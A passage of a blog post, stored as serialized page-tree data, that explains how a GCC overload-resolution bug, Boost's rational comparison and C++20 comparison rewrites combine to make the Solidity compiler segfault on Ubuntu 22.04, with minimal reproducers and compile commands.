a",{"type":24,"tag":301,"props":96540,"children":96541},{"style":359},[96542],{"type":30,"value":20835},{"type":24,"tag":301,"props":96544,"children":96545},{"style":348},[96546],{"type":30,"value":68388},{"type":24,"tag":301,"props":96548,"children":96549},{"style":348},[96550],{"type":30,"value":96551}," pure",{"type":24,"tag":301,"props":96553,"children":96554},{"style":308},[96555],{"type":30,"value":82706},{"type":24,"tag":301,"props":96557,"children":96558},{"style":359},[96559],{"type":30,"value":873},{"type":24,"tag":301,"props":96561,"children":96562},{"style":10246},[96563],{"type":30,"value":52904},{"type":24,"tag":301,"props":96565,"children":96566},{"style":359},[96567],{"type":30,"value":398},{"type":24,"tag":301,"props":96569,"children":96570},{"class":303,"line":415},[96571,96575,96579,96583,96587],{"type":24,"tag":301,"props":96572,"children":96573},{"style":308},[96574],{"type":30,"value":482},{"type":24,"tag":301,"props":96576,"children":96577},{"style":466},[96578],{"type":30,"value":487},{"type":24,"tag":301,"props":96580,"children":96581},{"style":385},[96582],{"type":30,"value":388},{"type":24,"tag":301,"props":96584,"children":96585},{"style":466},[96586],{"type":30,"value":469},{"type":24,"tag":301,"props":96588,"children":96589},{"style":359},[96590],{"type":30,"value":492},{"type":24,"tag":301,"props":96592,"children":96593},{"class":303,"line":439},[96594],{"type":24,"tag":301,"props":96595,"children":96596},{"style":359},[96597],{"type":30,"value":501},{"type":24,"tag":301,"props":96599,"children":96600},{"class":303,"line":447},[96601],{"type":24,"tag":301,"props":96602,"children":96603},{"style":359},[96604],{"type":30,"value":698},{"type":24,"tag":32,"props":96606,"children":96607},{},[96608],{"type":30,"value":96609},"Yet running Solidity's compiler (solc) on this file on a standard Ubuntu 22.04 system (G++ 11.4, Boost 1.74) causes an immediate segmentation fault.",{"type":24,"tag":32,"props":96611,"children":96612},{},[96613],{"type":30,"value":96614},"At first, this seemed absurd. The code just returns 1 to the power of 2 — no memory tricks, unsafe casting, or undefined behavior.",{"type":24,"tag":32,"props":96616,"children":96617},{},[96618],{"type":30,"value":96619},"And yet, it crashes.",{"type":24,"tag":32,"props":96621,"children":96622},{},[96623],{"type":30,"value":96624},"Another minimal example?",{"type":24,"tag":291,"props":96626,"children":96628},{"code":96627,"language":11299,"meta":7,"className":11300,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n function a() public pure {\n uint256[1] data;\n }\n}\n",[96629],{"type":24,"tag":145,"props":96630,"children":96631},{"__ignoreMap":7},[96632,96639,96654,96661,96676,96703,96724,96731],{"type":24,"tag":301,"props":96633,"children":96634},{"class":303,"line":304},[96635],{"type":24,"tag":301,"props":96636,"children":96637},{"style":1062},[96638],{"type":30,"value":96483},{"type":24,"tag":301,"props":96640,"children":96641},{"class":303,"line":320},[96642,96646,96650],{"type":24,"tag":301,"props":96643,"children":96644},{"style":308},[96645],{"type":30,"value":96491},{"type":24,"tag":301,"props":96647,"children":96648},{"style":348},[96649],{"type":30,"value":96496},{"type":24,"tag":301,"props":96651,"children":96652},{"style":359},[96653],{"type":30,"value":96501},{"type":24,"tag":301,"props":96655,"children":96656},{"class":303,"line":335},[96657],{"type":24,"tag":301,"props":96658,"children":96659},{"emptyLinePlaceholder":16},[96660],{"type":30,"value":341},{"type":24,"tag":301,"props":96662,"children":96663},{"class":303,"line":344},[96664,96668,96672],{"type":24,"tag":301,"props":96665,"children":96666},{"style":348},[96667],{"type":30,"value":96516},{"type":24,"tag":301,"props":96669,"children":96670},{"style":10246},[96671],{"type":30,"value":96521},{"type":24,"tag":301,"props":96673,"children":96674},{"style":359},[96675],{"type":30,"value":3035},{"type":24,"tag":301,"props":96677,"children":96678},{"class":303,"line":401},[96679,96683,96687,96691,96695,96699],{"type":24,"tag":301,"props":96680,"children":96681},{"style":348},[96682],{"type":30,"value":96533},{"type":24,"tag":301,"props":96684,"children":96685},{"style":314},[96686],{"type":30,"value":96538},{"type":24,"tag":301,"props":96688,"children":96689},{"style":359},[96690],{"type":30,"value":20835},{"type":24,"tag":301,"props":96692,"children":96693},{"style":348},[96694],{"type":30,"value":68388},{"type":24,"tag":301,"props":96696,"children":96697},{"style":348},[96698],{"type":30,"value":96551},{"type":24,"tag":301,"props":96700,"children":96701},{"style":359},[96702],{"type":30,"value":3035},{"type":24,"tag":301,"props":96704,"children":96705},{"class":303,"line":415},[96706,96711,96715,96719],{"type":24,"tag":301,"props":96707,"children":96708},{"style":10246},[96709],{"type":30,"value":96710}," uint256",{"type":24,"tag":301,"props":96712,"children":96713},{"style":359},[96714],{"type":30,"value":541},{"type":24,"tag":301,"props":96716,"children":96717},{"style":466},[96718],{"type":30,"value":546},{"type":24,"tag":301,"props":96720,"children":96721},{"style":359},[96722],{"type":30,"value":96723},"] data;\n",{"type":24,"tag":301,"props":96725,"children":96726},{"class":303,"line":439},[96727],{"type":24,"tag":301,"props":96728,"children":96729},{"style":359},[96730],{"type":30,"value":501},{"type":24,"tag":301,"props":96732,"children":96733},{"class":303,"line":447},[96734],{"type":24,"tag":301,"props":96735,"children":96736},{"style":359},[96737],{"type":30,"value":698},{"type":24,"tag":32,"props":96739,"children":96740},{},[96741],{"type":30,"value":96742},"Still crashes.",{"type":24,"tag":32,"props":96744,"children":96745},{},[96746],{"type":30,"value":96747},"So what’s going on?",{"type":24,"tag":32,"props":96749,"children":96750},{},[96751],{"type":30,"value":96752},"We traced it down to a seemingly unrelated C++ line deep in the compiler backend:",{"type":24,"tag":291,"props":96754,"children":96756},{"code":96755,"language":35868,"meta":7,"className":35866,"style":7},"if (*lengthValue == 0) { ... }\n",[96757],{"type":24,"tag":145,"props":96758,"children":96759},{"__ignoreMap":7},[96760],{"type":24,"tag":301,"props":96761,"children":96762},{"class":303,"line":304},[96763,96767,96771,96775,96780,96784,96788],{"type":24,"tag":301,"props":96764,"children":96765},{"style":308},[96766],{"type":30,"value":22368},{"type":24,"tag":301,"props":96768,"children":96769},{"style":359},[96770],{"type":30,"value":873},{"type":24,"tag":301,"props":96772,"children":96773},{"style":385},[96774],{"type":30,"value":772},{"type":24,"tag":301,"props":96776,"children":96777},{"style":359},[96778],{"type":30,"value":96779},"lengthValue ",{"type":24,"tag":301,"props":96781,"children":96782},{"style":385},[96783],{"type":30,"value":607},{"type":24,"tag":301,"props":96785,"children":96786},{"style":466},[96787],{"type":30,"value":685},{"type":24,"tag":301,"props":96789,"children":96790},{"style":359},[96791],{"type":30,"value":96792},") { ... }\n",{"type":24,"tag":32,"props":96794,"children":96795},{},[96796,96798,96804],{"type":30,"value":96797},"That single comparison — a ",{"type":24,"tag":145,"props":96799,"children":96801},{"className":96800},[],[96802],{"type":30,"value":96803},"boost::rational",{"type":30,"value":96805}," compared to 0 — causes infinite recursion in G++ \u003C 14 when compiled under C++20. And the resulting stack overflow crashes solc.",{"type":24,"tag":32,"props":96807,"children":96808},{},[96809],{"type":30,"value":96810},"This post unpacks how this happened — and why none of the individual components are technically \"broken\":",{"type":24,"tag":2655,"props":96812,"children":96813},{},[96814,96819,96824],{"type":24,"tag":2659,"props":96815,"children":96816},{},[96817],{"type":30,"value":96818},"A 12-year-old overload resolution bug in G++",{"type":24,"tag":2659,"props":96820,"children":96821},{},[96822],{"type":30,"value":96823},"An outdated symmetric comparison pattern in Boost",{"type":24,"tag":2659,"props":96825,"children":96826},{},[96827],{"type":30,"value":96828},"A subtle but impactful rewrite rule in C++20",{"type":24,"tag":32,"props":96830,"children":96831},{},[96832],{"type":30,"value":96833},"Put together, they form a perfect storm — one that takes down Solidity compilation on default Linux setups, even though your code is perfectly fine.",{"type":24,"tag":2719,"props":96835,"children":96836},{},[],{"type":24,"tag":43,"props":96838,"children":96840},{"id":96839},"background-the-setup",[96841],{"type":30,"value":96842},"Background: The Setup",{"type":24,"tag":32,"props":96844,"children":96845},{},[96846,96848,96855],{"type":30,"value":96847},"If you follow the ",{"type":24,"tag":188,"props":96849,"children":96852},{"href":96850,"rel":96851},"https://docs.soliditylang.org/en/v0.8.30/installing-solidity.html#building-from-source",[192],[96853],{"type":30,"value":96854},"Solidity build documentation (v0.8.30)",{"type":30,"value":96856},", you'll see it recommends:",{"type":24,"tag":2655,"props":96858,"children":96859},{},[96860,96865],{"type":24,"tag":2659,"props":96861,"children":96862},{},[96863],{"type":30,"value":96864},"Boost ≥ 1.67",{"type":24,"tag":2659,"props":96866,"children":96867},{},[96868],{"type":30,"value":96869},"GCC ≥ 11",{"type":24,"tag":32,"props":96871,"children":96872},{},[96873],{"type":30,"value":96874},"Ubuntu 22.04, for example, ships with:",{"type":24,"tag":2655,"props":96876,"children":96877},{},[96878,96883],{"type":24,"tag":2659,"props":96879,"children":96880},{},[96881],{"type":30,"value":96882},"G++ 11.4.0",{"type":24,"tag":2659,"props":96884,"children":96885},{},[96886],{"type":30,"value":96887},"Boost 1.74.0",{"type":24,"tag":32,"props":96889,"children":96890},{},[96891],{"type":30,"value":96892},"So far, so good.",{"type":24,"tag":32,"props":96894,"children":96895},{},[96896,96898,96903],{"type":30,"value":96897},"However, Solidity enabled ",{"type":24,"tag":60,"props":96899,"children":96900},{},[96901],{"type":30,"value":96902},"C++20",{"type":30,"value":96904}," in January 2025:",{"type":24,"tag":9770,"props":96906,"children":96907},{},[96908],{"type":24,"tag":32,"props":96909,"children":96910},{},[96911],{"type":24,"tag":188,"props":96912,"children":96915},{"href":96913,"rel":96914},"https://github.com/ethereum/solidity/commit/233a5081835a04939ccf85dfb5286c0b53d23c66",[192],[96916],{"type":30,"value":96917},"Enable C++20 in Solidity",{"type":24,"tag":32,"props":96919,"children":96920},{},[96921],{"type":30,"value":96922},"This wasn't accompanied by an update to the versions of dependencies in the documentation. As we'll soon see, that's what opened the trapdoor.",{"type":24,"tag":2719,"props":96924,"children":96925},{},[],{"type":24,"tag":43,"props":96927,"children":96929},{"id":96928},"part-i-a-12-year-old-g-bug-in-overload-resolution",[96930],{"type":30,"value":96931},"Part I: A 12-Year-Old G++ Bug in Overload Resolution",{"type":24,"tag":80,"props":96933,"children":96935},{"id":96934},"whats-overload-resolution",[96936],{"type":30,"value":96937},"What’s Overload Resolution?",{"type":24,"tag":32,"props":96939,"children":96940},{},[96941,96943,96949,96951,96957,96959,96964,96966,96971,96973,96979,96981,96986,96987,96993],{"type":30,"value":96942},"In C++, when you write an expression like ",{"type":24,"tag":145,"props":96944,"children":96946},{"className":96945},[],[96947],{"type":30,"value":96948},"a == b",{"type":30,"value":96950},", the compiler chooses among available ",{"type":24,"tag":145,"props":96952,"children":96954},{"className":96953},[],[96955],{"type":30,"value":96956},"operator==",{"type":30,"value":96958}," implementations by comparing their ",{"type":24,"tag":60,"props":96960,"children":96961},{},[96962],{"type":30,"value":96963},"match quality",{"type":30,"value":96965},". A ",{"type":24,"tag":60,"props":96967,"children":96968},{},[96969],{"type":30,"value":96970},"member function",{"type":30,"value":96972}," like ",{"type":24,"tag":145,"props":96974,"children":96976},{"className":96975},[],[96977],{"type":30,"value":96978},"a.operator==(b)",{"type":30,"value":96980}," usually has higher priority than a ",{"type":24,"tag":60,"props":96982,"children":96983},{},[96984],{"type":30,"value":96985},"non-member function",{"type":30,"value":96972},{"type":24,"tag":145,"props":96988,"children":96990},{"className":96989},[],[96991],{"type":30,"value":96992},"operator==(a, b)",{"type":30,"value":96994}," — unless the types differ too much or are ambiguous.",{"type":24,"tag":32,"props":96996,"children":96997},{},[96998],{"type":30,"value":96999},"That’s the rule. But G++ didn’t always follow it.",{"type":24,"tag":80,"props":97001,"children":97003},{"id":97002},"the-bug",[97004],{"type":30,"value":97005},"The Bug",{"type":24,"tag":32,"props":97007,"children":97008},{},[97009,97011,97018],{"type":30,"value":97010},"In 2012, a bug was filed: ",{"type":24,"tag":188,"props":97012,"children":97015},{"href":97013,"rel":97014},"https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53499",[192],[97016],{"type":30,"value":97017},"GCC Bug 53499 – overload resolution favors non-member function",{"type":30,"value":97019},". The issue? In expressions where:",{"type":24,"tag":2655,"props":97021,"children":97022},{},[97023,97043],{"type":24,"tag":2659,"props":97024,"children":97025},{},[97026,97028,97034,97036,97041],{"type":30,"value":97027},"A class ",{"type":24,"tag":145,"props":97029,"children":97031},{"className":97030},[],[97032],{"type":30,"value":97033},"rational\u003CT>",{"type":30,"value":97035}," has a templated ",{"type":24,"tag":145,"props":97037,"children":97039},{"className":97038},[],[97040],{"type":30,"value":96956},{"type":30,"value":97042}," member function",{"type":24,"tag":2659,"props":97044,"children":97045},{},[97046,97048,97054],{"type":30,"value":97047},"There's also a more generic free ",{"type":24,"tag":145,"props":97049,"children":97051},{"className":97050},[],[97052],{"type":30,"value":97053},"operator==(rational\u003CT>, U)",{"type":30,"value":44953},{"type":24,"tag":32,"props":97056,"children":97057},{},[97058],{"type":24,"tag":60,"props":97059,"children":97060},{},[97061],{"type":30,"value":97062},"Clang correctly chooses the member function.",{"type":24,"tag":32,"props":97064,"children":97065},{},[97066],{"type":24,"tag":60,"props":97067,"children":97068},{},[97069],{"type":30,"value":97070},"G++ (before v14) chooses the non-member function.",{"type":24,"tag":32,"props":97072,"children":97073},{},[97074,97076,97081,97083,97090],{"type":30,"value":97075},"Why? Because G++ mishandles ",{"type":24,"tag":60,"props":97077,"children":97078},{},[97079],{"type":30,"value":97080},"templated conversion + non-exact match",{"type":30,"value":97082},", overvaluing a non-member function with worse match quality. It does not correctly apply the overload resolution ranking rules defined in ",{"type":24,"tag":188,"props":97084,"children":97087},{"href":97085,"rel":97086},"https://cplusplus.github.io/CWG/issues/532.html",[192],[97088],{"type":30,"value":97089},"CWG532: Member/nonmember operator template partial ordering",{"type":30,"value":206},{"type":24,"tag":80,"props":97092,"children":97094},{"id":97093},"a-minimal-reproducer",[97095],{"type":30,"value":97096},"A Minimal Reproducer",{"type":24,"tag":32,"props":97098,"children":97099},{},[97100],{"type":30,"value":97101},"Let’s see this in action:",{"type":24,"tag":291,"props":97103,"children":97105},{"code":97104,"language":35868,"meta":7,"className":35866,"style":7},"#include \u003Ciostream>\n\ntemplate \u003Ctypename IntType>\nclass rational {\npublic:\n template \u003Cclass T>\n bool operator==(const T& i) const {\n std::cout \u003C\u003C \"clang++ resolved member\" \u003C\u003C std::endl;\n return true;\n }\n};\n\ntemplate \u003Cclass Arg, class IntType>\nbool operator==(const rational\u003CIntType>& a, const Arg& b) {\n std::cout \u003C\u003C \"g++ \u003C14 resolved non-member\" \u003C\u003C std::endl;\n return false;\n}\n\nint main() {\n rational\u003Cint> r;\n return r == 0;\n}\n",[97106],{"type":24,"tag":145,"props":97107,"children":97108},{"__ignoreMap":7},[97109,97121,97128,97153,97169,97177,97201,97246,97274,97289,97296,97303,97310,97346,97415,97440,97455,97462,97469,97484,97509,97533],{"type":24,"tag":301,"props":97110,"children":97111},{"class":303,"line":304},[97112,97116],{"type":24,"tag":301,"props":97113,"children":97114},{"style":308},[97115],{"type":30,"value":326},{"type":24,"tag":301,"props":97117,"children":97118},{"style":329},[97119],{"type":30,"value":97120}," \u003Ciostream>\n",{"type":24,"tag":301,"props":97122,"children":97123},{"class":303,"line":320},[97124],{"type":24,"tag":301,"props":97125,"children":97126},{"emptyLinePlaceholder":16},[97127],{"type":30,"value":341},{"type":24,"tag":301,"props":97129,"children":97130},{"class":303,"line":335},[97131,97135,97139,97144,97149],{"type":24,"tag":301,"props":97132,"children":97133},{"style":348},[97134],{"type":30,"value":72928},{"type":24,"tag":301,"props":97136,"children":97137},{"style":359},[97138],{"type":30,"value":3950},{"type":24,"tag":301,"props":97140,"children":97141},{"style":348},[97142],{"type":30,"value":97143},"typename",{"type":24,"tag":301,"props":97145,"children":97146},{"style":10246},[97147],{"type":30,"value":97148}," IntType",{"type":24,"tag":301,"props":97150,"children":97151},{"style":359},[97152],{"type":30,"value":12812},{"type":24,"tag":301,"props":97154,"children":97155},{"class":303,"line":344},[97156,97160,97165],{"type":24,"tag":301,"props":97157,"children":97158},{"style":348},[97159],{"type":30,"value":77123},{"type":24,"tag":301,"props":97161,"children":97162},{"style":10246},[97163],{"type":30,"value":97164}," rational",{"type":24,"tag":301,"props":97166,"children":97167},{"style":359},[97168],{"type":30,"value":3035},{"type":24,"tag":301,"props":97170,"children":97171},{"class":303,"line":401},[97172],{"type":24,"tag":301,"props":97173,"children":97174},{"style":348},[97175],{"type":30,"value":97176},"public:\n",{"type":24,"tag":301,"props":97178,"children":97179},{"class":303,"line":415},[97180,97185,97189,97193,97197],{"type":24,"tag":301,"props":97181,"children":97182},{"style":348},[97183],{"type":30,"value":97184}," template",{"type":24,"tag":301,"props":97186,"children":97187},{"style":359},[97188],{"type":30,"value":3950},{"type":24,"tag":301,"props":97190,"children":97191},{"style":348},[97192],{"type":30,"value":77123},{"type":24,"tag":301,"props":97194,"children":97195},{"style":10246},[97196],{"type":30,"value":12738},{"type":24,"tag":301,"props":97198,"children":97199},{"style":359},[97200],{"type":30,"value":12812},{"type":24,"tag":301,"props":97202,"children":97203},{"class":303,"line":439},[97204,97208,97213,97218,97222,97226,97230,97234,97238,97242],{"type":24,"tag":301,"props":97205,"children":97206},{"style":348},[97207],{"type":30,"value":53209},{"type":24,"tag":301,"props":97209,"children":97210},{"style":348},[97211],{"type":30,"value":97212}," operator",{"type":24,"tag":301,"props":97214,"children":97215},{"style":359},[97216],{"type":30,"value":97217},"==(",{"type":24,"tag":301,"props":97219,"children":97220},{"style":348},[97221],{"type":30,"value":16460},{"type":24,"tag":301,"props":97223,"children":97224},{"style":10246},[97225],{"type":30,"value":12738},{"type":24,"tag":301,"props":97227,"children":97228},{"style":348},[97229],{"type":30,"value":556},{"type":24,"tag":301,"props":97231,"children":97232},{"style":369},[97233],{"type":30,"value":10225},{"type":24,"tag":301,"props":97235,"children":97236},{"style":359},[97237],{"type":30,"value":911},{"type":24,"tag":301,"props":97239,"children":97240},{"style":348},[97241],{"type":30,"value":16460},{"type":24,"tag":301,"props":97243,"children":97244},{"style":359},[97245],{"type":30,"value":3035},{"type":24,"tag":301,"props":97247,"children":97248},{"class":303,"line":447},[97249,97254,97259,97264,97269],{"type":24,"tag":301,"props":97250,"children":97251},{"style":359},[97252],{"type":30,"value":97253}," std::cout ",{"type":24,"tag":301,"props":97255,"children":97256},{"style":385},[97257],{"type":30,"value":97258},"\u003C\u003C",{"type":24,"tag":301,"props":97260,"children":97261},{"style":329},[97262],{"type":30,"value":97263}," \"clang++ resolved member\"",{"type":24,"tag":301,"props":97265,"children":97266},{"style":385},[97267],{"type":30,"value":97268}," \u003C\u003C",{"type":24,"tag":301,"props":97270,"children":97271},{"style":359},[97272],{"type":30,"value":97273}," std::endl;\n",{"type":24,"tag":301,"props":97275,"children":97276},{"class":303,"line":476},[97277,97281,97285],{"type":24,"tag":301,"props":97278,"children":97279},{"style":308},[97280],{"type":30,"value":482},{"type":24,"tag":301,"props":97282,"children":97283},{"style":348},[97284],{"type":30,"value":3440},{"type":24,"tag":301,"props":97286,"children":97287},{"style":359},[97288],{"type":30,"value":492},{"type":24,"tag":301,"props":97290,"children":97291},{"class":303,"line":495},[97292],{"type":24,"tag":301,"props":97293,"children":97294},{"style":359},[97295],{"type":30,"value":501},{"type":24,"tag":301,"props":97297,"children":97298},{"class":303,"line":504},[97299],{"type":24,"tag":301,"props":97300,"children":97301},{"style":359},[97302],{"type":30,"value":3118},{"type":24,"tag":301,"props":97304,"children":97305},{"class":303,"line":512},[97306],{"type":24,"tag":301,"props":97307,"children":97308},{"emptyLinePlaceholder":16},[97309],{"type":30,"value":341},{"type":24,"tag":301,"props":97311,"children":97312},{"class":303,"line":592},[97313,97317,97321,97325,97330,97334,97338,97342],{"type":24,"tag":301,"props":97314,"children":97315},{"style":348},[97316],{"type":30,"value":72928},{"type":24,"tag":301,"props":97318,"children":97319},{"style":359},[97320],{"type":30,"value":3950},{"type":24,"tag":301,"props":97322,"children":97323},{"style":348},[97324],{"type":30,"value":77123},{"type":24,"tag":301,"props":97326,"children":97327},{"style":10246},[97328],{"type":30,"value":97329}," Arg",{"type":24,"tag":301,"props":97331,"children":97332},{"style":359},[97333],{"type":30,"value":377},{"type":24,"tag":301,"props":97335,"children":97336},{"style":348},[97337],{"type":30,"value":77123},{"type":24,"tag":301,"props":97339,"children":97340},{"style":10246},[97341],{"type":30,"value":97148},{"type":24,"tag":301,"props":97343,"children":97344},{"style":359},[97345],{"type":30,"value":12812},{"type":24,"tag":301,"props":97347,"children":97348},{"class":303,"line":619},[97349,97353,97357,97361,97365,97369,97373,97378,97382,97386,97390,97394,97398,97402,97406,97411],{"type":24,"tag":301,"props":97350,"children":97351},{"style":348},[97352],{"type":30,"value":36442},{"type":24,"tag":301,"props":97354,"children":97355},{"style":348},[97356],{"type":30,"value":97212},{"type":24,"tag":301,"props":97358,"children":97359},{"style":359},[97360],{"type":30,"value":97217},{"type":24,"tag":301,"props":97362,"children":97363},{"style":348},[97364],{"type":30,"value":16460},{"type":24,"tag":301,"props":97366,"children":97367},{"style":10246},[97368],{"type":30,"value":97164},{"type":24,"tag":301,"props":97370,"children":97371},{"style":359},[97372],{"type":30,"value":1849},{"type":24,"tag":301,"props":97374,"children":97375},{"style":10246},[97376],{"type":30,"value":97377},"IntType",{"type":24,"tag":301,"props":97379,"children":97380},{"style":359},[97381],{"type":30,"value":1456},{"type":24,"tag":301,"props":97383,"children":97384},{"style":348},[97385],{"type":30,"value":556},{"type":24,"tag":301,"props":97387,"children":97388},{"style":369},[97389],{"type":30,"value":96538},{"type":24,"tag":301,"props":97391,"children":97392},{"style":359},[97393],{"type":30,"value":377},{"type":24,"tag":301,"props":97395,"children":97396},{"style":348},[97397],{"type":30,"value":16460},{"type":24,"tag":301,"props":97399,"children":97400},{"style":10246},[97401],{"type":30,"value":97329},{"type":24,"tag":301,"props":97403,"children":97404},{"style":348},[97405],{"type":30,"value":556},{"type":24,"tag":301,"props":97407,"children":97408},{"style":369},[97409],{"type":30,"value":97410}," b",{"type":24,"tag":301,"props":97412,"children":97413},{"style":359},[97414],{"type":30,"value":398},{"type":24,"tag":301,"props":97416,"children":97417},{"class":303,"line":635},[97418,97423,97427,97432,97436],{"type":24,"tag":301,"props":97419,"children":97420},{"style":359},[97421],{"type":30,"value":97422}," std::cout ",{"type":24,"tag":301,"props":97424,"children":97425},{"style":385},[97426],{"type":30,"value":97258},{"type":24,"tag":301,"props":97428,"children":97429},{"style":329},[97430],{"type":30,"value":97431}," \"g++ \u003C14 resolved non-member\"",{"type":24,"tag":301,"props":97433,"children":97434},{"style":385},[97435],{"type":30,"value":97268},{"type":24,"tag":301,"props":97437,"children":97438},{"style":359},[97439],{"type":30,"value":97273},{"type":24,"tag":301,"props":97441,"children":97442},{"class":303,"line":643},[97443,97447,97451],{"type":24,"tag":301,"props":97444,"children":97445},{"style":308},[97446],{"type":30,"value":680},{"type":24,"tag":301,"props":97448,"children":97449},{"style":348},[97450],{"type":30,"value":3613},{"type":24,"tag":301,"props":97452,"children":97453},{"style":359},[97454],{"type":30,"value":492},{"type":24,"tag":301,"props":97456,"children":97457},{"class":303,"line":652},[97458],{"type":24,"tag":301,"props":97459,"children":97460},{"style":359},[97461],{"type":30,"value":698},{"type":24,"tag":301,"props":97463,"children":97464},{"class":303,"line":666},[97465],{"type":24,"tag":301,"props":97466,"children":97467},{"emptyLinePlaceholder":16},[97468],{"type":30,"value":341},{"type":24,"tag":301,"props":97470,"children":97471},{"class":303,"line":674},[97472,97476,97480],{"type":24,"tag":301,"props":97473,"children":97474},{"style":348},[97475],{"type":30,"value":351},{"type":24,"tag":301,"props":97477,"children":97478},{"style":314},[97479],{"type":30,"value":356},{"type":24,"tag":301,"props":97481,"children":97482},{"style":359},[97483],{"type":30,"value":3883},{"type":24,"tag":301,"props":97485,"children":97486},{"class":303,"line":692},[97487,97492,97496,97500,97504],{"type":24,"tag":301,"props":97488,"children":97489},{"style":359},[97490],{"type":30,"value":97491}," rational",{"type":24,"tag":301,"props":97493,"children":97494},{"style":385},[97495],{"type":30,"value":1849},{"type":24,"tag":301,"props":97497,"children":97498},{"style":348},[97499],{"type":30,"value":351},{"type":24,"tag":301,"props":97501,"children":97502},{"style":385},[97503],{"type":30,"value":1456},{"type":24,"tag":301,"props":97505,"children":97506},{"style":359},[97507],{"type":30,"value":97508}," r;\n",{"type":24,"tag":301,"props":97510,"children":97511},{"class":303,"line":3631},[97512,97516,97521,97525,97529],{"type":24,"tag":301,"props":97513,"children":97514},{"style":308},[97515],{"type":30,"value":680},{"type":24,"tag":301,"props":97517,"children":97518},{"style":359},[97519],{"type":30,"value":97520}," r ",{"type":24,"tag":301,"props":97522,"children":97523},{"style":385},[97524],{"type":30,"value":607},{"type":24,"tag":301,"props":97526,"children":97527},{"style":466},[97528],{"type":30,"value":685},{"type":24,"tag":301,"props":97530,"children":97531},{"style":359},[97532],{"type":30,"value":492},{"type":24,"tag":301,"props":97534,"children":97535},{"class":303,"line":3639},[97536],{"type":24,"tag":301,"props":97537,"children":97538},{"style":359},[97539],{"type":30,"value":698},{"type":24,"tag":2655,"props":97541,"children":97542},{},[97543],{"type":24,"tag":2659,"props":97544,"children":97545},{},[97546],{"type":30,"value":97547},"Compile with g++\u003C14:",{"type":24,"tag":291,"props":97549,"children":97551},{"code":97550,"language":11068,"meta":7,"className":11069,"style":7},"g++ -std=c++17 main.cpp -o test && ./test\n",[97552],{"type":24,"tag":145,"props":97553,"children":97554},{"__ignoreMap":7},[97555],{"type":24,"tag":301,"props":97556,"children":97557},{"class":303,"line":304},[97558,97563,97568,97573,97578,97582,97587],{"type":24,"tag":301,"props":97559,"children":97560},{"style":314},[97561],{"type":30,"value":97562},"g++",{"type":24,"tag":301,"props":97564,"children":97565},{"style":329},[97566],{"type":30,"value":97567}," -std=c++17",{"type":24,"tag":301,"props":97569,"children":97570},{"style":329},[97571],{"type":30,"value":97572}," main.cpp",{"type":24,"tag":301,"props":97574,"children":97575},{"style":329},[97576],{"type":30,"value":97577}," -o",{"type":24,"tag":301,"props":97579,"children":97580},{"style":329},[97581],{"type":30,"value":37434},{"type":24,"tag":301,"props":97583,"children":97584},{"style":359},[97585],{"type":30,"value":97586}," && ",{"type":24,"tag":301,"props":97588,"children":97589},{"style":314},[97590],{"type":30,"value":97591},"./test\n",{"type":24,"tag":32,"props":97593,"children":97594},{},[97595],{"type":30,"value":97596},"Output (on g++ 11.4):",{"type":24,"tag":291,"props":97598,"children":97600},{"code":97599},"g++ \u003C14 resolved non-member\n",[97601],{"type":24,"tag":145,"props":97602,"children":97603},{"__ignoreMap":7},[97604],{"type":30,"value":97599},{"type":24,"tag":2655,"props":97606,"children":97607},{},[97608],{"type":24,"tag":2659,"props":97609,"children":97610},{},[97611],{"type":30,"value":97612},"Compile with clang++:",{"type":24,"tag":291,"props":97614,"children":97616},{"code":97615,"language":11068,"meta":7,"className":11069,"style":7},"clang++ -std=c++17 main.cpp -o test && ./test\n",[97617],{"type":24,"tag":145,"props":97618,"children":97619},{"__ignoreMap":7},[97620],{"type":24,"tag":301,"props":97621,"children":97622},{"class":303,"line":304},[97623,97628,97632,97636,97640,97644,97648],{"type":24,"tag":301,"props":97624,"children":97625},{"style":314},[97626],{"type":30,"value":97627},"clang++",{"type":24,"tag":301,"props":97629,"children":97630},{"style":329},[97631],{"type":30,"value":97567},{"type":24,"tag":301,"props":97633,"children":97634},{"style":329},[97635],{"type":30,"value":97572},{"type":24,"tag":301,"props":97637,"children":97638},{"style":329},[97639],{"type":30,"value":97577},{"type":24,"tag":301,"props":97641,"children":97642},{"style":329},[97643],{"type":30,"value":37434},{"type":24,"tag":301,"props":97645,"children":97646},{"style":359},[97647],{"type":30,"value":97586},{"type":24,"tag":301,"props":97649,"children":97650},{"style":314},[97651],{"type":30,"value":97591},{"type":24,"tag":32,"props":97653,"children":97654},{},[97655],{"type":30,"value":97656},"Output:",{"type":24,"tag":291,"props":97658,"children":97660},{"code":97659},"clang++ resolved member\n",[97661],{"type":24,"tag":145,"props":97662,"children":97663},{"__ignoreMap":7},[97664],{"type":30,"value":97659},{"type":24,"tag":32,"props":97666,"children":97667},{},[97668],{"type":30,"value":97669},"In short, the wrong function gets picked. G++ was broken here until v14.",{"type":24,"tag":2719,"props":97671,"children":97672},{},[],{"type":24,"tag":43,"props":97674,"children":97676},{"id":97675},"part-ii-c20s-symmetric-comparison-feature",[97677],{"type":30,"value":97678},"Part II: C++20’s Symmetric Comparison Feature",{"type":24,"tag":80,"props":97680,"children":97682},{"id":97681},"what-changed-in-c20",[97683],{"type":30,"value":97684},"What Changed in C++20?",{"type":24,"tag":32,"props":97686,"children":97687},{},[97688,97690,97703,97704,97709],{"type":30,"value":97689},"C++20 introduced the ",{"type":24,"tag":188,"props":97691,"children":97694},{"href":97692,"rel":97693},"https://en.cppreference.com/w/cpp/language/operator_comparison",[192],[97695,97697],{"type":30,"value":97696},"spaceship operator ",{"type":24,"tag":145,"props":97698,"children":97700},{"className":97699},[],[97701],{"type":30,"value":97702},"\u003C=>",{"type":30,"value":2378},{"type":24,"tag":60,"props":97705,"children":97706},{},[97707],{"type":30,"value":97708},"defaulted comparison rewrites",{"type":30,"value":206},{"type":24,"tag":32,"props":97711,"children":97712},{},[97713,97715,97720],{"type":30,"value":97714},"When you define a two-argument ",{"type":24,"tag":145,"props":97716,"children":97718},{"className":97717},[],[97719],{"type":30,"value":96956},{"type":30,"value":97721},", C++20 may implicitly define the \"reversed\" version:",{"type":24,"tag":2655,"props":97723,"children":97724},{},[97725,97736],{"type":24,"tag":2659,"props":97726,"children":97727},{},[97728,97730],{"type":30,"value":97729},"If you define: ",{"type":24,"tag":145,"props":97731,"children":97733},{"className":97732},[],[97734],{"type":30,"value":97735},"bool operator==(T1, 